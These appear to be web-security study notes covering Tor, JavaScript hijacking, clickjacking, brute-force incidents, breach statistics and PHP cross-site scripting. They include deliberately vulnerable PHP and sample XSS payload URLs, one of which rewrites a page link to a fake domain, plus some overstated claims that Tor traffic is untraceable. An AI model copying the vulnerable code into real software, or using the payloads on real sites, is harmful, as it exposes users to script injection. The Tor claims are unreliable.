TOR network is a protective layer that sits between the User and the Internet. It provides an anonymous path between you and sites you visit. 1. Your computer: the TOR program runs on your machine. It encrypts all info and sends it into the TOR network 2. Into the network: Encrypted info, still considered unbreakable, is sent into the TOR network 3. Untraceable: Your info travels through the TOR network taking random paths, making its origin and destination untraceable 4. Decrypting the Document: The exit node decrypts the untraceable info and sends it to the destination 5. In the clear: From the exit node, unencrypted but anonymous data flows into and out of the internet 6. The internet: Web sites see you as visiting from a random location, not identifiable to you.
JavaScript Hijacking Method
The malicious code uses a script tag to include the JSON object in the current page. The Web browser will send up the appropriate session cookie with the request (CSRF). This request will be handled just as though it had originated from the legitimate application. When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. If the user is not logged into the vulnerable site, the attacker can compensate by asking the user to log in and then displaying the legitimate login page for the application. This is not a phishing attack--the attacker does not gain access to the user's credentials--so anti-phishing countermeasures will not be able to defeat the attack
Clickjacking Example
Twitter Hijack via Clickjacking (Feb 2009) Hundreds of thousands of messages saying Don't click http://tinyurl.com/amgzs6 started showing up. Clicking the link shows a simple page with I button. Clicking the button uses clickjacking to repost the message to your own twitter account (if you are logged in).
Brute Force example
Twitter hacked using Brute Force (Jan 09), a hacker who goes by the handle GMZ gained entry to Twitter's administrative control panel by pointing an automated password-guesser at a popular user's account. The user turned out to be a member of Twitter's support staff, who'd chosen a weak password "happiness." Cracking the site was easy because Twitter allowed an unlimited number of rapid fire log in attempts Implication: hacker managed to send tweets posing as Obama, Britney, and O'Reilly
Why Secure the Web
Web has evolved into an ubiquitous entity providing a rich and common platform for connecting people and doing business BUT, the web also offers a cheap, effective, convenient and anonymous platform for crime To get an idea, Web has been used for the following types of criminal activities: Chaos, deceit, extortion, identity theft, information warfare, monetary loss, physical pain, political defacements, chinese gaming sites hacked
2017 Internet Security Report
Web threats: > 1 Billion web requests analyzed each day, up 5% from 2016 1 in 13 web requests lead to malware, up 3% from 2016 Malware: 92% increase in new downloader variants 80% increase in new malware on Macs 8500% increase in coinminer detections Email: Percentage spam rate from 53% in 2015/2016 to 55% in 2017 Ransomware: 5.4B WannaCry attacks blocked 46% increase in new ransomware variants IoT 600% increase in attacks against IoT devices from 2016 to 2017 Attack origin: US 11%, Russian Federation 6%, China 21%, Japan 4%, India 5%, Brazil 7% Mobile: Number of new variants increase from 17K in 2016 to 27K in 2017 Increase in mobile malware variants 54% 24,000 is average number of malicious mobile apps blocked each day App categories that have the most malicious mobile apps are 27% lifestyle, 20% music & audio Leaky apps most often leak phone numbers (63%) and device location (37%)
Weak Password Recovery Validation
When a web site permits an attacker to illegally obtain, change or recover another users credentials. A website is said to have a weak password recovery mechanism when a hacker can easily foil the recovery mechanism by guessing the answers to the secret questions and thus recovering or changing the password of the legitimate user. Following are some example of a bad recovery method: information verification (asking the user to supply their email address along with their phone number, both publicly available), password hints (many users have a tendency to embed the password in the hint itself like the hint bday+favauthor can easily be translated by someone knowing the user to 110490asimov), secret question and answer (something like "In which city were you born?" for a password recovery system is easily circumventable today because most of the info is public due to the social networking sistes)
Cross-Site Scripting Example
XSS enables attackers to inject client-side script into web pages viewed by others if the programmer writes the PHP code: <form method='post' action="<?php echo $_SERVER['PHP_SELF'];?>"> If a user enters http://www.example.com/test_form.php The above is translated into <form method= 'post' action='test_form.php'> which is fine However if the user enters http://www.example.com/test_form.php/%22%3ECscrpt%3Ealert('hacked')%3C/scrpt% 3E The above code translates it into <form method='post' action='test_form.php/'><scrpt>alert('hacked')</scrpt>
Top corporate hacks
Yahoo - 2016 - 1 billion customers Yahoo - 2016 - 500 million customers Equifax - 2017 - 143 million customers (largest ever publicly disclosed by a company) Heartland Payment System - 2009 - 130 million accounts/cards LinkedIn - 2016 - 117 million customers Sony - 2011 - 100 million customers TJX - 2007 - 90 million accounts/cards Anthem - 2015 - 80 million customers J.P.Morgan - 2014 - 76 millions of households Target - 2013 - 70 millions of customers initially disclosed Home Depot - 2014 - 56 million accounts/cards
Insufficient Authentication Example
eBay hacked and many users accounts got suspended by hacker (Oct 2007) The hacker found very old administrative functions that had not been deactivated several years ago when the security of internal systems was changed. These functions were still accessible on public servers, while the rest of the functionality was behind multiple layers of security.
Non-Persistent XSS Attack Example
index.php: <?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href='http://xssattackexamples.com/'>Click to Download</a>"; ?> The attacker crafts a url that sends it to the victim index.php?name=guest<scrpt>alert("attacked")</scrpt> When the victim loads the avobe URL he sees an alert box which says "attacked" this example does no damage Attacker crafts second URL and sends it to the victim: index.php?name=<scrpt>window.onload = function() { var link=document.getElementsByTagName('a'); link[0].href="http://not-real-xssattackexamples.com/"; }</scrpt> Now the href of the first link on the page has been changed to point to the not-real-xssattackexamples. Typically the attacker will encode the ASCII characters with for examp %3c%73%63...